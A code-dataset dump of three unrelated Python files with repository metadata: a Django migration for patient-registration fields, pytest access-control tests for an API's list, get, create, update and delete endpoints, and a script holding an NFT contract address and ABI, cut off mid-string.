] | 189
|
2020-03-17T17:18:58.000Z
|
2022-02-22T09:49:45.000Z
|
care/facility/migrations/0067_auto_20200402_1841.py
|
gigincg/care
|
07be6a7982b5c46a854e3435a52662f32800c8ae
|
[
"MIT"
] | 598
|
2020-03-19T21:22:09.000Z
|
2022-03-30T05:08:37.000Z
|
care/facility/migrations/0067_auto_20200402_1841.py
|
gigincg/care
|
07be6a7982b5c46a854e3435a52662f32800c8ae
|
[
"MIT"
] | 159
|
2020-03-19T18:45:56.000Z
|
2022-03-17T13:23:12.000Z
|
# Generated by Django 2.2.11 on 2020-04-02 18:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facility', '0066_auto_20200402_1806'),
]
operations = [
migrations.AlterField(
model_name='historicalpatientregistration',
name='blood_group',
field=models.CharField(blank=True, choices=[('A+', 'A+'), ('A-', 'A-'), ('B+', 'B+'), ('B-', 'B-'), ('AB+', 'AB+'), ('AB-', 'AB-'), ('O+', 'O+'), ('O-', 'O-')], max_length=4, null=True, verbose_name='Blood Group of Patient'),
),
migrations.AlterField(
model_name='historicalpatientregistration',
name='countries_travelled',
field=models.TextField(blank=True, default='', verbose_name='Countries Patient has Travelled to'),
),
migrations.AlterField(
model_name='historicalpatientregistration',
name='date_of_return',
field=models.DateTimeField(blank=True, null=True, verbose_name='Return Date from the Last Country if Travelled'),
),
migrations.AlterField(
model_name='historicalpatientregistration',
name='disease_status',
field=models.IntegerField(blank=True, choices=[(1, 'SUSPECTED'), (2, 'POSITIVE'), (3, 'NEGATIVE'), (4, 'RECOVERY'), (5, 'RECOVERED'), (5, 'EXPIRED')], default=1, verbose_name='Disease Status'),
),
migrations.AlterField(
model_name='historicalpatientregistration',
name='number_of_aged_dependents',
field=models.IntegerField(blank=True, default=0, verbose_name='Number of people aged above 60 living with the patient'),
),
migrations.AlterField(
model_name='historicalpatientregistration',
name='number_of_chronic_diseased_dependents',
field=models.IntegerField(blank=True, default=0, verbose_name='Number of people who have chronic diseases living with the patient'),
),
migrations.AlterField(
model_name='historicalpatientregistration',
name='present_health',
field=models.TextField(blank=True, default='', verbose_name="Patient's Current Health Details"),
),
migrations.AlterField(
model_name='patientregistration',
name='blood_group',
field=models.CharField(blank=True, choices=[('A+', 'A+'), ('A-', 'A-'), ('B+', 'B+'), ('B-', 'B-'), ('AB+', 'AB+'), ('AB-', 'AB-'), ('O+', 'O+'), ('O-', 'O-')], max_length=4, null=True, verbose_name='Blood Group of Patient'),
),
migrations.AlterField(
model_name='patientregistration',
name='countries_travelled',
field=models.TextField(blank=True, default='', verbose_name='Countries Patient has Travelled to'),
),
migrations.AlterField(
model_name='patientregistration',
name='date_of_return',
field=models.DateTimeField(blank=True, null=True, verbose_name='Return Date from the Last Country if Travelled'),
),
migrations.AlterField(
model_name='patientregistration',
name='disease_status',
field=models.IntegerField(blank=True, choices=[(1, 'SUSPECTED'), (2, 'POSITIVE'), (3, 'NEGATIVE'), (4, 'RECOVERY'), (5, 'RECOVERED'), (5, 'EXPIRED')], default=1, verbose_name='Disease Status'),
),
migrations.AlterField(
model_name='patientregistration',
name='number_of_aged_dependents',
field=models.IntegerField(blank=True, default=0, verbose_name='Number of people aged above 60 living with the patient'),
),
migrations.AlterField(
model_name='patientregistration',
name='number_of_chronic_diseased_dependents',
field=models.IntegerField(blank=True, default=0, verbose_name='Number of people who have chronic diseases living with the patient'),
),
migrations.AlterField(
model_name='patientregistration',
name='present_health',
field=models.TextField(blank=True, default='', verbose_name="Patient's Current Health Details"),
),
]
| 50.416667
| 237
| 0.61464
| 431
| 4,235
| 5.902552
| 0.213457
| 0.110063
| 0.137579
| 0.159591
| 0.940252
| 0.940252
| 0.860849
| 0.841981
| 0.823113
| 0.823113
| 0
| 0.017375
| 0.238961
| 4,235
| 83
| 238
| 51.024096
| 0.771952
| 0.010862
| 0
| 0.909091
| 1
| 0
| 0.320277
| 0.083592
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012987
| 0
| 0.051948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3c09a5694befd46a62cc1eb0446cbad360a1bf7
| 23,792
|
py
|
Python
|
tests/integration/test_access.py
|
alexcfaber/katka-core
|
39a09f76b052f879ad5c0d53b74593c049930d5e
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_access.py
|
alexcfaber/katka-core
|
39a09f76b052f879ad5c0d53b74593c049930d5e
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_access.py
|
alexcfaber/katka-core
|
39a09f76b052f879ad5c0d53b74593c049930d5e
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from tests.integration.conftest import anonymous_client, scoped_client, user_client
@pytest.mark.django_db
class TestList:
@pytest.mark.parametrize(
("client_ctx_manager", "url", "http_status", "expected_length"),
[
(anonymous_client, "/applications/", 403, None),
(anonymous_client, "/applications/{application.public_identifier}/metadata/", 403, None),
(anonymous_client, "/teams/", 403, None),
(anonymous_client, "/projects/", 403, None),
(anonymous_client, "/credentials/", 403, None),
(anonymous_client, "/credentials/{credential.public_identifier}/secrets/", 403, None),
(anonymous_client, "/scm-services/", 403, None),
(anonymous_client, "/scm-repositories/", 403, None),
(anonymous_client, "/scm-pipeline-runs/", 403, None),
(anonymous_client, "/scm-step-runs/", 403, None),
(anonymous_client, "/scm-releases/", 403, None),
(user_client, "/applications/", 200, 2),
(user_client, "/applications/{application.public_identifier}/metadata/", 200, 1),
(user_client, "/teams/", 200, 2),
(user_client, "/projects/", 200, 2),
(user_client, "/credentials/", 200, 3), # 3 because of my_other_teams_credential
(user_client, "/credentials/{credential.public_identifier}/secrets/", 200, 1), # only one per credential
(user_client, "/scm-services/", 200, 2),
(user_client, "/scm-repositories/", 200, 2),
(user_client, "/scm-pipeline-runs/", 200, 4),
(user_client, "/scm-step-runs/", 200, 2),
(user_client, "/scm-releases/", 200, 2),
(scoped_client, "/applications/", 200, 3),
(scoped_client, "/applications/{application.public_identifier}/metadata/", 200, 1,),
(scoped_client, "/teams/", 200, 3),
(scoped_client, "/projects/", 200, 3),
(scoped_client, "/credentials/", 200, 4), # 4 because of my_other_teams_credential
(scoped_client, "/credentials/{credential.public_identifier}/secrets/", 200, 1), # only one per credential
(scoped_client, "/scm-services/", 200, 2),
(scoped_client, "/scm-repositories/", 200, 3),
(scoped_client, "/scm-pipeline-runs/", 200, 5),
(scoped_client, "/scm-step-runs/", 200, 3),
(scoped_client, "/scm-releases/", 200, 3),
],
)
def test_list(self, client_ctx_manager, url, http_status, expected_length, most_models):
with client_ctx_manager() as client:
url = url.format(**most_models)
response = client.get(url)
assert response.status_code == http_status
if expected_length is not None:
parsed = response.json()
assert len(parsed) == expected_length
@pytest.mark.django_db
class TestGet:
@pytest.mark.parametrize(
("client_ctx_manager", "url", "http_status"),
[
(anonymous_client, "/applications/{application.public_identifier}/", 403),
(anonymous_client, "/applications/unknown/", 403),
(anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
(anonymous_client, "/teams/{team.public_identifier}/", 403),
(anonymous_client, "/projects/{project.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
(anonymous_client, "/scm-services/{service.public_identifier}/", 403),
(anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
(anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
(anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
(anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
(user_client, "/applications/{application.public_identifier}/", 200),
(user_client, "/applications/unknown/", 404),
(user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
(user_client, "/teams/{team.public_identifier}/", 200),
(user_client, "/projects/{project.public_identifier}/", 200),
(user_client, "/credentials/{credential.public_identifier}/", 200),
(user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
(user_client, "/scm-services/{service.public_identifier}/", 200),
(user_client, "/scm-repositories/{repository.public_identifier}/", 200),
(user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
(user_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
(user_client, "/scm-releases/{release.public_identifier}/", 200),
# check user_client, but this time with everything that does not belong to that user
(user_client, "/applications/{not_my_application.public_identifier}/", 404),
(user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
(user_client, "/teams/{not_my_team.public_identifier}/", 404),
(user_client, "/projects/{not_my_project.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
# no need to check services again, since they are all public
(user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
(user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
(user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
(user_client, "/scm-releases/{not_my_release.public_identifier}/", 404),
(scoped_client, "/applications/{application.public_identifier}/", 200),
(scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
(scoped_client, "/teams/{team.public_identifier}/", 200),
(scoped_client, "/projects/{project.public_identifier}/", 200),
(scoped_client, "/credentials/{credential.public_identifier}/", 200),
(scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
(scoped_client, "/scm-services/{service.public_identifier}/", 200),
(scoped_client, "/scm-repositories/{repository.public_identifier}/", 200),
(scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
(scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
(scoped_client, "/scm-releases/{release.public_identifier}/", 200),
],
)
def test_get(self, client_ctx_manager, url, http_status, most_models):
with client_ctx_manager() as client:
url = url.format(**most_models)
response = client.get(url)
assert response.status_code == http_status
@pytest.mark.django_db
class TestDelete:
@pytest.mark.parametrize(
("client_ctx_manager", "url", "http_status"),
[
(anonymous_client, "/applications/{application.public_identifier}/", 403),
(anonymous_client, "/applications/unknown/", 403),
(anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
(anonymous_client, "/teams/{team.public_identifier}/", 403),
(anonymous_client, "/projects/{project.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
(anonymous_client, "/scm-services/{service.public_identifier}/", 403),
(anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
(anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
(anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
(anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
(user_client, "/applications/{application.public_identifier}/", 204),
(user_client, "/applications/unknown/", 404),
(user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 204),
(user_client, "/teams/{team.public_identifier}/", 204),
(user_client, "/projects/{project.public_identifier}/", 204),
(user_client, "/credentials/{credential.public_identifier}/", 204),
(user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 204),
(user_client, "/scm-services/{service.public_identifier}/", 405),
(user_client, "/scm-repositories/{repository.public_identifier}/", 204),
(user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 204),
(user_client, "/scm-step-runs/{step_run.public_identifier}/", 204),
(user_client, "/scm-releases/{release.public_identifier}/", 405),
# check user_client, but this time with everything that does not belong to that user
(user_client, "/applications/{not_my_application.public_identifier}/", 404),
(user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
(user_client, "/teams/{not_my_team.public_identifier}/", 404),
(user_client, "/projects/{not_my_project.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
# no need to check services again, since they are all public
(user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
(user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
(user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
(user_client, "/scm-releases/{not_my_release.public_identifier}/", 405),
(scoped_client, "/applications/{application.public_identifier}/", 204),
(scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 204),
(scoped_client, "/teams/{team.public_identifier}/", 204),
(scoped_client, "/projects/{project.public_identifier}/", 204),
(scoped_client, "/credentials/{credential.public_identifier}/", 204),
(scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 204),
(scoped_client, "/scm-services/{service.public_identifier}/", 405),
(scoped_client, "/scm-repositories/{repository.public_identifier}/", 204),
(scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 204),
(scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 204),
(scoped_client, "/scm-releases/{release.public_identifier}/", 405),
],
)
def test_delete(self, client_ctx_manager, url, http_status, most_models):
with client_ctx_manager() as client:
url = url.format(**most_models)
response = client.delete(url)
assert response.status_code == http_status
@pytest.mark.django_db
class TestUpdate:
@pytest.mark.parametrize(
("client_ctx_manager", "url", "http_status"),
[
(anonymous_client, "/applications/{application.public_identifier}/", 403),
(anonymous_client, "/applications/unknown/", 403),
(anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
(anonymous_client, "/teams/{team.public_identifier}/", 403),
(anonymous_client, "/projects/{project.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
(anonymous_client, "/scm-services/{service.public_identifier}/", 403),
(anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
(anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
(anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
(anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
# since the put has incomplete data, we expect a 400 when we are allowed, not a 200 like with patch
(user_client, "/applications/{application.public_identifier}/", 400),
(user_client, "/applications/unknown/", 404),
(user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 400),
(user_client, "/teams/{team.public_identifier}/", 400),
(user_client, "/projects/{project.public_identifier}/", 400),
(user_client, "/credentials/{credential.public_identifier}/", 400),
(user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 400),
(user_client, "/scm-services/{service.public_identifier}/", 405),
(user_client, "/scm-repositories/{repository.public_identifier}/", 400),
(user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 400),
(user_client, "/scm-step-runs/{step_run.public_identifier}/", 400),
(user_client, "/scm-releases/{release.public_identifier}/", 405),
# check user_client, but this time with everything that does not belong to that user
(user_client, "/applications/{not_my_application.public_identifier}/", 404),
(user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
(user_client, "/teams/{not_my_team.public_identifier}/", 404),
(user_client, "/projects/{not_my_project.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
# no need to check services again, since they are all public
(user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
(user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
(user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
(user_client, "/scm-releases/{not_my_release.public_identifier}/", 405),
(scoped_client, "/applications/{application.public_identifier}/", 400),
(scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 400),
(scoped_client, "/teams/{team.public_identifier}/", 400),
(scoped_client, "/projects/{project.public_identifier}/", 400),
(scoped_client, "/credentials/{credential.public_identifier}/", 400),
(scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 400),
(scoped_client, "/scm-services/{service.public_identifier}/", 405),
(scoped_client, "/scm-repositories/{repository.public_identifier}/", 400),
(scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 400),
(scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 400),
(scoped_client, "/scm-releases/{release.public_identifier}/", 405),
],
)
def test_update(self, client_ctx_manager, url, http_status, most_models):
with client_ctx_manager() as client:
url = url.format(**most_models)
response = client.put(url)
assert response.status_code == http_status
@pytest.mark.django_db
class TestPartialUpdate:
@pytest.mark.parametrize(
("client_ctx_manager", "url", "http_status"),
[
(anonymous_client, "/applications/{application.public_identifier}/", 403),
(anonymous_client, "/applications/unknown/", 403),
(anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
(anonymous_client, "/teams/{team.public_identifier}/", 403),
(anonymous_client, "/projects/{project.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
(anonymous_client, "/scm-services/{service.public_identifier}/", 403),
(anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
(anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
(anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
(anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
(user_client, "/applications/{application.public_identifier}/", 200),
(user_client, "/applications/unknown/", 404),
(user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
(user_client, "/teams/{team.public_identifier}/", 200),
(user_client, "/projects/{project.public_identifier}/", 200),
(user_client, "/credentials/{credential.public_identifier}/", 200),
(user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
(user_client, "/scm-services/{service.public_identifier}/", 405),
(user_client, "/scm-repositories/{repository.public_identifier}/", 200),
(user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
(user_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
(user_client, "/scm-releases/{release.public_identifier}/", 405),
# check user_client, but this time with everything that does not belong to that user
(user_client, "/applications/{not_my_application.public_identifier}/", 404),
(user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
(user_client, "/teams/{not_my_team.public_identifier}/", 404),
(user_client, "/projects/{not_my_project.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
(user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
# no need to check services again, since they are all public
(user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
(user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
(user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
(user_client, "/scm-releases/{not_my_release.public_identifier}/", 405),
(scoped_client, "/applications/{application.public_identifier}/", 200),
(scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
(scoped_client, "/teams/{team.public_identifier}/", 200),
(scoped_client, "/projects/{project.public_identifier}/", 200),
(scoped_client, "/credentials/{credential.public_identifier}/", 200),
(scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
(scoped_client, "/scm-services/{service.public_identifier}/", 405),
(scoped_client, "/scm-repositories/{repository.public_identifier}/", 200),
(scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
(scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
(scoped_client, "/scm-releases/{release.public_identifier}/", 405),
],
)
def test_partial_update(self, client_ctx_manager, url, http_status, most_models):
with client_ctx_manager() as client:
url = url.format(**most_models)
response = client.patch(url)
assert response.status_code == http_status
@pytest.mark.django_db
class TestCreate:
@pytest.mark.parametrize(
("client_ctx_manager", "url", "http_status"),
[
(anonymous_client, "/applications/", 403),
(anonymous_client, "/applications/unknown/", 403),
(anonymous_client, "/applications/{application.public_identifier}/metadata/", 403),
(anonymous_client, "/teams/", 403),
(anonymous_client, "/projects/", 403),
(anonymous_client, "/credentials/", 403),
(anonymous_client, "/credentials/{credential.public_identifier}/secrets/", 403),
(anonymous_client, "/scm-services/", 403),
(anonymous_client, "/scm-repositories/", 403),
(anonymous_client, "/scm-pipeline-runs/", 403),
(anonymous_client, "/scm-step-runs/", 403),
(anonymous_client, "/scm-releases/", 403),
# since the post has incomplete data, we expect a 400 when we are allowed, not a 200 like with patch
(user_client, "/applications/", 400),
(user_client, "/applications/{application.public_identifier}/metadata/", 400),
(user_client, "/teams/", 400),
(user_client, "/projects/", 400),
(user_client, "/credentials/", 400),
(user_client, "/credentials/{credential.public_identifier}/secrets/", 400),
(user_client, "/scm-services/", 405),
(user_client, "/scm-repositories/", 400),
(user_client, "/scm-pipeline-runs/", 400),
(user_client, "/scm-step-runs/", 400),
(user_client, "/scm-releases/", 405),
# check user_client, but this time with everything that does not belong to that user
(user_client, "/applications/{not_my_application.public_identifier}/metadata/", 403),
(user_client, "/credentials/{not_my_credential.public_identifier}/secrets/", 403),
(scoped_client, "/applications/", 400),
(scoped_client, "/applications/{application.public_identifier}/metadata/", 400),
(scoped_client, "/teams/", 400),
(scoped_client, "/projects/", 400),
(scoped_client, "/credentials/", 400),
(scoped_client, "/credentials/{credential.public_identifier}/secrets/", 400),
(scoped_client, "/scm-services/", 405),
(scoped_client, "/scm-repositories/", 400),
(scoped_client, "/scm-pipeline-runs/", 400),
(scoped_client, "/scm-step-runs/", 400),
(scoped_client, "/scm-releases/", 405),
],
)
def test_create(self, client_ctx_manager, url, http_status, most_models):
with client_ctx_manager() as client:
url = url.format(**most_models)
response = client.post(url, {}, content_type="application/json")
assert response.status_code == http_status
| 67.977143
| 119
| 0.642317
| 2,493
| 23,792
| 5.86081
| 0.050943
| 0.203682
| 0.067757
| 0.061324
| 0.936418
| 0.894121
| 0.849429
| 0.841421
| 0.803983
| 0.719595
| 0
| 0.041291
| 0.202967
| 23,792
| 349
| 120
| 68.17192
| 0.72921
| 0.040896
| 0
| 0.56135
| 0
| 0
| 0.459589
| 0.417182
| 0
| 0
| 0
| 0
| 0.021472
| 1
| 0.018405
| false
| 0
| 0.006135
| 0
| 0.042945
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3d6489da43a2ad29cbe7287c4dfa4484a030e38
| 13,530
|
py
|
Python
|
src/lucha_utils.py
|
sznicolas/luchadata
|
effc3579ef00103b6601f4a6b67a0ac1e0fbef91
|
[
"MIT"
] | 3
|
2021-08-20T22:12:55.000Z
|
2022-01-19T17:09:46.000Z
|
src/lucha_utils.py
|
sznicolas/luchadata
|
effc3579ef00103b6601f4a6b67a0ac1e0fbef91
|
[
"MIT"
] | null | null | null |
src/lucha_utils.py
|
sznicolas/luchadata
|
effc3579ef00103b6601f4a6b67a0ac1e0fbef91
|
[
"MIT"
] | 1
|
2022-01-19T17:09:48.000Z
|
2022-01-19T17:09:48.000Z
|
#!/usr/bin/env python3
"""
"""
from web3 import Web3
# first to last block containing a GenerateLuchador event
firstblock = 12450223
lastblock = 13046665
# Contracts data
lucha_contract_addr = "0x8b4616926705Fb61E9C4eeAc07cd946a5D4b0760"
lucha_abi = '[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"dna","type":"uint256"}],"name":"GenerateLuchador","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_quantity","type":"uint256"},{"internalType":"uint256","name":"_deadline","type":"uint256"}],"name":"generateLuchador","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"imageData","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"metadata","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pauseSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"requestId","type":"bytes32"},{"internalType":"uint256","name":"randomness","type":"uint256"}],"name":"rawFulfillRandomness","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_baseURI","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_LinkFee","type":"uint256"}],"name":"setLinkFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapRouter","outputs":[{"internalType":"contract 